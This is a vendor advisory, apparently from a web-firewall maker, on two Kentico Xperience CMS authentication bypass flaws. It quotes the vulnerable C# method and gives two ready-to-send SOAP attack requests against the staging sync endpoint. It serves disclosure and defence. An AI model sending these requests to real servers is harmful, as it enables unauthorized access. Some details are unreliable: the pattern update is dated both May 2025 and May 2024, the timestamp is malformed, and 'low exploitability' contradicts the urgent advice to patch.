2025.06 - Kentico Xperience CMS Authentication Bypass
The vulnerability is an authentication bypass vulnerability in the Kentico Xperience CMS platform, which could allow an attacker to attempt to bypass the authentication process by sending crafted SOAP data to the vulnerable endpoint, Staging/SyncServer.asmx.
The vulnerability was patched in Kentico Xperience CMS platform version 13.0.178, and AIWAF responded by adding patterns to detect these vulnerabilities in a May 2025 pattern update.
1. Overview
Xperience CMS is a digital marketing platform provided by Kentico, which is an integrated system platform that includes content management services, digital marketing, e-commerce management, and more.
This report summarizes our analysis of CVE-2025-2746 and CVE-2025-2747, the authentication bypass and RCE vulnerabilities recently discovered in the platform.
Source : https://en.wikipedia.org/wiki/Kentico_Xperience
2. Attack type
CVE-2025-2746 is an authentication bypass vulnerability that leverages a vulnerable authentication system in certain endpoints of Kentico's Xperience CMS platform. According to watchtowr, who analyzed the vulnerability, an attacker can attempt to bypass the authentication process by sending crafted SOAP data to the vulnerable endpoint, Staging/SyncServer.asmx, by exploiting the return of the password hash value as an empty string when an invalid username is entered during the authentication process.
protected override string AuthenticateToken(UsernameToken token)
{
if (token == null)
{
throw new ArgumentNullException("[WebServiceAuthorization.AuthenticateToken]: Missing username authentication token.");
}
AbstractStockHelper<RequestStockHelper>.Add("AUTH_PROCESSED", true, false);
string value = SettingsKeyInfoProvider.GetValue(SiteContext.CurrentSiteName + ".CMSStagingServiceUsername");
string text = EncryptionHelper.DecryptData(SettingsKeyInfoProvider.GetValue(SiteContext.CurrentSiteName + ".CMSStagingServicePassword"));
if (string.IsNullOrEmpty(text))
{
throw new SecurityException("[WebServiceAuthorization.AuthenticateToken]: Staging does not work with blank password. Set a password on the target server.");
}
if (value == token.Username)
{
return StagingTaskRunner.GetSHA1Hash(text);
}
return "";
}
Source : https://labs.watchtowr.com/bypassing-authentication-like-its-the-90s-pre-auth-rce-chain-s-in-kentico-xperience-cms/
An attacker can bypass the authentication process by selecting the hash-based password verification mode, sending a SOAP request with a SHA1 hash code in the form of an empty string password, and, in conjunction with the vulnerability, leverage the internal API after authentication to attempt an RCE attack.
Example attack Request :
POST /CMSPages/Staging/SyncServer.asmx HTTP/1.1
Host: www.test.com
Content-Type: text/xml; charset=utf-8
Content-Length: 1095
SOAPAction: "<http://localhost/SyncWebService/SyncServer/ProcessSynchronizationTaskData>"
<soap:Envelope xmlns:xsi="<http://www.w3.org/2001/XMLSchema-instance>" xmlns:xsd="<http://www.w3.org/2001/XMLSchema>" xmlns:soap="<http://schemas.xmlsoap.org/soap/envelope/>">
<soap:Header>
<wsse:Security xmlns:wsse="<http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd>" xmlns:wsu="<http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd>">
<wsse:UsernameToken>
<wsse:Username>hacker</wsse:Username>
<wsse:Password Type="<http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-username-token-profile-1.0#PasswordDigest>">OZ/c8o7h3mtigow7HXu0f+BUgLk=</wsse:Password>
<wsse:Nonce>MTIzNDU2Nzg5MDEyMzQ1Njc4OTAxMjM=</wsse:Nonce>
<wsu:Created>2025-05-013T014:54:17Z</wsu:Created>
</wsse:UsernameToken>
</wsse:Security>
</soap:Header>
<soap:Body>
<ProcessSynchronizationTaskData xmlns="<http://localhost/SyncWebService/SyncServer>">
<stagingTaskData><![CDATA[<hacker>]]></stagingTaskData>
</ProcessSynchronizationTaskData>
</soap:Body>
</soap:Envelope>
CVE-2025-2747 is an authentication bypass vulnerability that bypasses the CVE-2025-2746 vulnerability patch. It is possible to exploit a vulnerable version of the library system to bypass authentication by sending a SOAP request with only a valid username and no password-related tags.
Example attack Request :
POST /CMSPages/Staging/SyncServer.asmx HTTP/1.1
Host: www.test.com
Content-Type: text/xml; charset=utf-8
Content-Length: 1095
SOAPAction: "<http://localhost/SyncWebService/SyncServer/ProcessSynchronizationTaskData>"
<soap:Header>
<wsse:Security xmlns:wsse="<http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd>" xmlns:wsu="<http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd>">
<wsse:UsernameToken>
<wsse:Username>hacker</wsse:Username>
</wsse:UsernameToken>
</wsse:Security>
</soap:Header>
3. Mitigation
Kentico has released patches for CVE-2025-2746 and CVE-2025-2747, so users of the platform should check their version of Xperience and respond by patching to a specific version or higher.
Our AIWAF product is responding via pattern 2260: Kentico Xperience Authentication Bypass, which is part of the May 2024 pattern update.
Source : https://devnet.kentico.com/download/hotfixes#securityBugs-v13
4. Conclusion
Kentico's Xperience CMS platform is an integrated system platform that includes content management services, digital marketing, and e-commerce management, and the vulnerabilities, CVE-2025-2746 and CVE-2025-2747, should be patched to the latest version as soon as possible due to their low exploitability and high impact on the service.
Our AIWAF product has developed a pattern to respond to vulnerabilities in Kentico's products, and we will continue to respond quickly to related vulnerabilities found in the future.
